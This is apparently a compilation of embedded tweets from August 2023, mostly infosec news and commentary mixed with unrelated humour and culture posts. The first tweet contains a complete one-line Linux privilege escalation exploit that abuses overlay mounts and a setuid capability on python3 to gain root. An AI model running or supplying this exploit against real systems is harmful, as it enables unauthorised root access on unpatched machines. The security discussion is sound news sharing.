Exploit is so easy it fits in a tweet🔥
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' https://t.co/qb53rfeh0y pic.twitter.com/O9lcif1Yad

— liad eliyahu (@liadeliyahu) July 28, 2023

It has, in fact, been heard of. https://t.co/goCDs0uc36

— Blake Herzinger | @bdherzinger.bsky.social (@BDHerzinger) August 4, 2023

pic.twitter.com/9G8yUK7ZtT

— Classical Studies Memes for Hellenistic Teens (@CSMFHT) August 4, 2023

The transatlantic econ discourse pic.twitter.com/1rQeqWJxSn

— IYER Ⓥ (@IyerC) August 4, 2023

Don't fear the tool. Fear the vulns. Police are alerting on @flipper_zero's potential for bypassing access control systems. I wouldn't call it a bypass. These are systems *missing* access control and relying on solely security by obscurity. pic.twitter.com/53nFcdIIfS

— Chris Wysopal (@WeldPond) August 3, 2023

PSA if you see code that uses nodejs's url.parse in combination with a standards-compliant URL parser (like window.URL, nodejs URL, etc.) it's likely to have some security issues pic.twitter.com/CbQGBRODGJ

— yan (@bcrypt) August 3, 2023

wow this presentation by @scannell_simon is such a great read with the clever ideas to defeat ASLR (in a "black hole").:)https://t.co/cAcxK26UUc

— Haifei Li (@HaifeiLi) August 4, 2023

Last night in a surprising final twist in an already bonkers story the husband in this cyber crime couple admitted he was the hacker in the original 2016 theft of $4.5bn. He blew his 'rapper' wife a kiss from the dock as they were both sent down. https://t.co/yip2IrgHOA

— Joe Tidy (@joetidy) August 4, 2023

In border radio’s early days, psychics and mystics ruled the airwaves: https://t.co/vXwNzeozmY

— Jaka Bartolj (@MediaHistoryNow) August 4, 2023

"Google has 175,000+ capable and well-compensated employees who get very little done."

Google will make arguments they need to monopolize to improve their product but the truth everyone knows is that Google Search now sucks. https://t.co/b7skoCNGxL

— Matt Stoller (@matthewstoller) August 4, 2023

We, the JPEG'd team, based on confidential discussions, formally assert that upon successful return of the funds to the JPEG'd DAO multisig:

1. Legal action will not be taken against the operator of the address 0x6Ec21d1868743a44318c3C259a6d4953F9978538 and…

— JPEG'd (@JPEGd_69) August 4, 2023

pic.twitter.com/T5Xx4tdYYU

— No Context Brits (@NoContextBrits) August 4, 2023

Could the superconducting material be the key to unlocking the lab leak controversy? It may seem unlikely, but nothing is impossible... on the blockchain. We ask three MMT experts for their input, and along the way chat to them about their pick of NFTs.

— Liam Bright (@lastpositivist) August 2, 2023

https://t.co/J9FYFMJTcZ pic.twitter.com/gS9xzH3z6u

— Jack Tindale (@JackTindale) August 4, 2023

🚨 InfoSec Journos and researchers be aware, fake profiles are popping for some of our industry’s favourites. Motive is unknown, potentially just a crypto scam. But keep an eye out in case it’s an APT trying something.

Cc @TonyaJoRiley @joetidy

⚠️ Fake Profiles ⬇️ pic.twitter.com/heyF23vORC

— Will (@BushidoToken) August 5, 2023

Akira Kurosawa's Ran — an epic riff on King Lear that required 200 horses, 1,400 suits of armor, building a full-size *castle* on the slopes of Mt. Fuji & burning it down, and spraying an entire field gold for a scene that got cut — cost almost $200 million less than The Flash.

— david ehrlich (@davidehrlich) August 4, 2023

https://t.co/sMBXY20qAj

— Dr. Dan Lomas (@Sandbagger_01) August 5, 2023